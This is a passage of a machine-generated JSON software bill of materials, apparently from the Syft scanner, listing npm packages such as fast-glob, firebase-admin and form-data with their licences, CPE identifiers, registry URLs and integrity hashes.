.org/fast-equals/-/fast-equals-5.4.0.tgz","integrity":"sha512-jt2DW/aNFNwke7AUd+Z+e6pz39KO5rzdbbFCg2sGafS4mk13MI7Z8O5z9cADNn5lhGODIgLwug6TZO2ctf7kcw==","dependencies":null}},{"id":"756085ffd4026f3c","name":"fast-glob","version":"3.3.3","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:fast-glob:fast-glob:3.3.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:fast-glob:fast_glob:3.3.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:fast_glob:fast-glob:3.3.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:fast_glob:fast_glob:3.3.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:fast:fast-glob:3.3.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:fast:fast_glob:3.3.3:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/fast-glob@3.3.3","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/fast-glob/-/fast-glob-3.3.3.tgz","integrity":"sha512-7MptL8U0cqcFdzIzwOTHoilX9x5BrNqye7Z/LuC7kCMRio1EMSyqRK3BEAUD7sXRq4iT4AzTVuZdhgQ2TCvYLg==","dependencies":{"@nodelib/fs.stat":"^2.0.2","@nodelib/fs.walk":"^1.2.3","glob-parent":"^5.1.2","merge2":"^1.3.0","micromatch":"^4.0.8"}}},{"id":"b198a6d2f9894f68","name":"fast-xml-builder","version":"1.1.5","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:fast-xml-builder:fast-xml-builder:1.1.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:fast-xml-builder:fast_xml_builder:1.1.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:fast_xml_builder:fast-xml-builder:1.1.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:fast_xml_builder:fast_xml_builder:1.1.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:fast-xml:fast-xml-builder:1.1.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:fast-xml:fast_xml_builder:1.1.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:fast_xml:fast-xml-builder:1.1.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:fast_xml:fast_xml_builder:1.1.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:fast:fast-xml-builder:1.1.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:fast:fast_xml_builder:1.1.5:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/fast-xml-builder@1.1.5","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/fast-xml-builder/-/fast-xml-builder-1.1.5.tgz","integrity":"sha512-4TJn/8FKLeslLAH3dnohXqE3QSoxkhvaMzepOIZytwJXZO69Bfz0HBdDHzOTOon6G59Zrk6VQ2bEiv1t61rfkA==","dependencies":{"path-expression-matcher":"^1.1.3"}}},{"id":"03ef00f42507be2f","name":"fast-xml-parser","version":"5.7.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:naturalintelligence:fast-xml-parser:5.7.2:*:*:*:*:*:*:*","source":"nvd-cpe-dictionary"}],"purl":"pkg:npm/fast-xml-parser@5.7.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/fast-xml-parser/-/fast-xml-parser-5.7.2.tgz","integrity":"sha512-P7oW7tLbYnhOLQk/Gv7cZgzgMPP/XN03K02/Jy6Y/NHzyIAIpxuZIM/YqAkfiXFPxA2CTm7NtCijK9EDu09u2w==","dependencies":{"@nodable/entities":"^2.1.0","fast-xml-builder":"^1.1.5","path-expression-matcher":"^1.5.0","strnum":"^2.2.3"}}},{"id":"32597e8bd5ad1e0f","name":"fastq","version":"1.20.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"ISC","spdxExpression":"ISC","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:fastq:fastq:1.20.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/fastq@1.20.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/fastq/-/fastq-1.20.1.tgz","integrity":"sha512-GGToxJ/w1x32s/D2EKND7kTil4n8OVk/9mycTc4VDza13lOvpUZTGX3mFSCtV9ksdGBVzvsyAVLM6mHFThxXxw==","dependencies":{"reusify":"^1.0.4"}}},{"id":"5a9d4671ef023c43","name":"faye-websocket","version":"0.11.4","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"Apache-2.0","spdxExpression":"Apache-2.0","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:faye-websocket:faye-websocket:0.11.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:faye-websocket:faye_websocket:0.11.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:faye_websocket:faye-websocket:0.11.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:faye_websocket:faye_websocket:0.11.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:faye:faye-websocket:0.11.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:faye:faye_websocket:0.11.4:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/faye-websocket@0.11.4","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/faye-websocket/-/faye-websocket-0.11.4.tgz","integrity":"sha512-CzbClwlXAuiRQAlUyfqPgvPoNKTckTPGfwZV4ZdAhVcP2lh9KUxJg2b5GkE7XbjKQ3YJnQ9z6D9ntLAlB+tP8g==","dependencies":{"websocket-driver":">=0.5.1"}}},{"id":"4d9064c107e69a4e","name":"fdir","version":"6.5.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:fdir:fdir:6.5.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/fdir@6.5.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/fdir/-/fdir-6.5.0.tgz","integrity":"sha512-tIbYtZbucOs0BRGqPJkshJUYdL+SDH7dVM8gjy+ERp3WAUjLEFJE+02kanyHtwjWOnwrKYBiwAmM0p4kLJAnXg==","dependencies":null}},{"id":"ad8b63b86fd3ee37","name":"fflate","version":"0.8.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:fflate:fflate:0.8.2:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/fflate@0.8.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/fflate/-/fflate-0.8.2.tgz","integrity":"sha512-cPJU47OaAoCbg0pBvzsgpTPhmhqI5eJjh/JIu8tPj5q+T7iLvW/JAYUqmE7KOB4R1ZyEhzBaIQpQpardBF5z8A==","dependencies":null}},{"id":"adf22420cd3811ab","name":"fill-range","version":"7.1.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:fill-range:fill-range:7.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:fill-range:fill_range:7.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:fill_range:fill-range:7.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:fill_range:fill_range:7.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:fill:fill-range:7.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:fill:fill_range:7.1.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/fill-range@7.1.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/fill-range/-/fill-range-7.1.1.tgz","integrity":"sha512-YsGpe3WHLK8ZYi4tWDg2Jy3ebRz2rXowDxnld4bkQB00cc/1Zw9AWnC0i9ztDJitivtQvaI9KaLyKrc+hBW0yg==","dependencies":{"to-regex-range":"^5.0.1"}}},{"id":"257d2278606af57b","name":"finalhandler","version":"1.3.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:finalhandler:finalhandler:1.3.2:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/finalhandler@1.3.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/finalhandler/-/finalhandler-1.3.2.tgz","integrity":"sha512-aA4RyPcd3badbdABGDuTXCMTtOneUCAYH/gxoYRTZlIJdF0YPWuGqiAsIrhNnnqdXGswYk6dGujem4w80UJFhg==","dependencies":{"debug":"2.6.9","encodeurl":"~2.0.0","escape-html":"~1.0.3","on-finished":"~2.4.1","parseurl":"~1.3.3","statuses":"~2.0.2","unpipe":"~1.0.0"}}},{"id":"dde504db4cea8c91","name":"find-up","version":"4.1.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:find-up:find-up:4.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:find-up:find_up:4.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:find_up:find-up:4.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:find_up:find_up:4.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:find:find-up:4.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:find:find_up:4.1.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/find-up@4.1.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/find-up/-/find-up-4.1.0.tgz","integrity":"sha512-PpOwAdQ/YlXQ2vj8a3h8IipDuYRi3wceVQQGYWxNINccq40Anw7BlsEXCMbt1Zt+OLA6Fq9suIpIWD0OsnISlw==","dependencies":{"locate-path":"^5.0.0","path-exists":"^4.0.0"}}},{"id":"01aea657af389bb4","name":"firebase-admin","version":"12.7.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"Apache-2.0","spdxExpression":"Apache-2.0","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:firebase-admin:firebase-admin:12.7.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:firebase-admin:firebase_admin:12.7.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:firebase_admin:firebase-admin:12.7.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:firebase_admin:firebase_admin:12.7.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:firebase:firebase-admin:12.7.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:firebase:firebase_admin:12.7.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/firebase-admin@12.7.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/firebase-admin/-/firebase-admin-12.7.0.tgz","integrity":"sha512-raFIrOyTqREbyXsNkSHyciQLfv8AUZazehPaQS1lZBSCDYW74FYXU0nQZa3qHI4K+hawohlDbywZ4+qce9YNxA==","dependencies":{"@fastify/busboy":"^3.0.0","@firebase/database-compat":"1.0.8","@firebase/database-types":"1.0.5","@types/node":"^22.0.1","farmhash-modern":"^1.1.0","jsonwebtoken":"^9.0.0","jwks-rsa":"^3.1.0","node-forge":"^1.3.1","uuid":"^10.0.0"}}},{"id":"a8847fd98501e6bd","name":"follow-redirects","version":"1.16.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:follow-redirects:follow_redirects:1.16.0:*:*:*:*:node.js:*:*","source":"nvd-cpe-dictionary"}],"purl":"pkg:npm/follow-redirects@1.16.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/follow-redirects/-/follow-redirects-1.16.0.tgz","integrity":"sha512-y5rN/uOsadFT/JfYwhxRS5R7Qce+g3zG97+JrtFZlC9klX/W5hD7iiLzScI4nZqUS7DNUdhPgw4xI8W2LuXlUw==","dependencies":null}},{"id":"83c2ace663a40ea8","name":"fontkit","version":"2.0.4","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:fontkit:fontkit:2.0.4:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/fontkit@2.0.4","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/fontkit/-/fontkit-2.0.4.tgz","integrity":"sha512-syetQadaUEDNdxdugga9CpEYVaQIxOwk7GlwZWWZ19//qW4zE5bknOKeMBDYAASwnpaSHKJITRLMF9m1fp3s6g==","dependencies":{"@swc/helpers":"^0.5.12","brotli":"^1.3.2","clone":"^2.1.2","dfa":"^1.2.0","fast-deep-equal":"^3.1.3","restructure":"^3.0.0","tiny-inflate":"^1.0.3","unicode-properties":"^1.4.0","unicode-trie":"^2.0.0"}}},{"id":"be5a9ebbd8259fbe","name":"foreground-child","version":"3.3.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"ISC","spdxExpression":"ISC","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:foreground-child:foreground-child:3.3.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:foreground-child:foreground_child:3.3.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:foreground_child:foreground-child:3.3.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:foreground_child:foreground_child:3.3.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:foreground:foreground-child:3.3.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:foreground:foreground_child:3.3.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/foreground-child@3.3.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/foreground-child/-/foreground-child-3.3.1.tgz","integrity":"sha512-gIXjKqtFuWEgzFRJA9WCQeSJLZDjgJUOMCMzxtvFq/37KojM1BFGufqsCy0r4qSQmYLsZYMeyRqzIWOMup03sw==","dependencies":{"cross-spawn":"^7.0.6","signal-exit":"^4.0.1"}}},{"id":"cccf1222c38fa883","name":"form-data","version":"2.5.5","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:form-data:form-data:2.5.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:form-data:form_data:2.5.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:form_data:form-data:2.5.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:form_data:form_data:2.5.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:form:form-data:2.5.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:form:form_data:2.5.5:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/form-data@2.5.5","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/form-data/-/form-data-2.5.5.tgz","integrity":"sha512-jqdObeR2rxZZbPSGL+3VckHMYtu+f9//KXBsVny6JSX/pa38Fy+bGjuG8eW/H6USNQWhLi8Num++cU2yOCNz4A==","dependencies":{"asynckit":"^0.4.0","combined-stream":"^1.0.8","es-set-tostringtag":"^2.1.0","hasown":"^2.0.2","mime-types":"^2.1.35","safe-buffer":"^5.2.1"}}},{"id":"fb8802f2379acb63","name":"form-data","version":"4.0.5","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:form-data:form-data:4.0.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:form-data:form_data:4.0.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:form_data:form-data:4.0.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:form_data:form_data:4.0.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:form:form-data:4.0.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:form:form_data:4.0.5:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/form-data@4.0.5","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/form-data/-/form-data-4.0.5.tgz","integrity":"sha512-8RipRLol37bNs2bhoV67fiTEvdTrbMUYcFTiy3+wuuOnUog2QBHCZWXDRijWQfAkhBj2Uf5UnVaiWwA5vdd82w==","dependencies":{"asynckit":"^0.4.0","combined-stream":"^1.0.8","es-set-tostringtag":"^2.1.0","hasown":"^2.0.2","mime-types":"^2.1.12"}}},{"id":"e972502f7a8ea944","name":"forwarded","version":"0.2.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:forwarded_project:forwarded:0.2.0:*:*:*:*:node.js:*:*","source":"nvd-cpe-dictionary"}],"purl":"pkg:npm/forwarded@0.2.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/forwarded/-/forwarded-0.2.0.tgz","integrity":"sha512-buRG0fpBtRHSTCOASe6hD258tEubFoRLb4ZNA6NxMVHNw2gOcwHo9wyablzMzOA5z9xA9L1KNjk/Nt6MT9aYow==","dependencies":null}},{"id":"f45608cb782e3ae1","name":"fraction.js","version":"5.3.4","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:fraction.js:fraction.js:5.3.4:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/fraction.js@5.3.4","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/fraction.js/-/fraction.js-5.3.4.tgz","integrity":"sha512-1X1NTtiJphryn/uLQz3whtY6jK3fTqoE3ohKs0tT+Ujr1W59oopxmoEh7Lu5p6vBaPbgoM0bzveAW4Qi5RyWDQ==","dependencies":null}},{"id":"7908a3419570e85d","name":"fresh","version":"0.5.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:fresh_project:fresh:0.5.2:*:*:*:*:node.js:*:*","source":"nvd-cpe-dictionary"}],"purl":"pkg:npm/fresh@0.5.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/fresh/-/fresh-0.5.2.tgz","integrity":"sha512-zJ2mQYM18rEFOudeV4GShTGIQ7RbzA7ozbU9I/XBpm7kqgMywgmylMwXHxZJmkVoYkna9d2pVXVXPdYTP9ej8Q==","dependencies":null}},{"id":"585a401b2834ec08","name":"fsevents","version":"2.3.3","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:fsevents:fsevents:2.3.3:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/fsevents@2.3.3","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/fsevents/-/fsevents-2.3.3.tgz","integrity":"sha512-5xoDfX+fL7faATnagmWPpbFtwh/R77WmMMqqHGS65C3vvB0YHrgF+B1YmZ3441tMj5n63k0212XNoJwzlhffQw==","dependencies":null}},{"id":"a9db1e71931f56ac","name":"function-bind","version":"1.1.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:function-bind:function-bind:1.1.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:function-bind:function_bind:1.1.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:function_bind:function-bind:1.1.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:function_bind:function_bind:1.1.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:function:function-bind:1.1.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:function:function_bind:1.1.2:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/function-bind@1.1.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/function-bind/-/function-bind-1.1.2.tgz","integrity":"sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA==","dependencies":null}},{"id":"06c01b9cd08a3446","name":"functional-red-black-tree","version":"1.0.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:functional-red-black-tree:functional-red-black-tree:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:functional-red-black-tree:functional_red_black_tree:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:functional_red_black_tree:functional-red-black-tree:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:functional_red_black_tree:functional_red_black_tree:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:functional-red-black:functional-red-black-tree:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:functional-red-black:functional_red_black_tree:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:functional_red_black:functional-red-black-tree:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:functional_red_black:functional_red_black_tree:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:functional-red:functional-red-black-tree:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:functional-red:functional_red_black_tree:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:functional_red:functional-red-black-tree:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:functional_red:functional_red_black_tree:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:functional:functional-red-black-tree:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:functional:functional_red_black_tree:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/functional-red-black-tree@1.0.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/functional-red-black-tree/-/functional-red-black-tree-1.0.1.tgz","integrity":"sha512-dsKNQNdj6xA3T+QlADDA7mOSlX0qiMINjn0cgr+eGHGsbSHzTabcIogz2+p/iqP1Xs6EP/sS2SbqH+brGTbq0g==","dependenci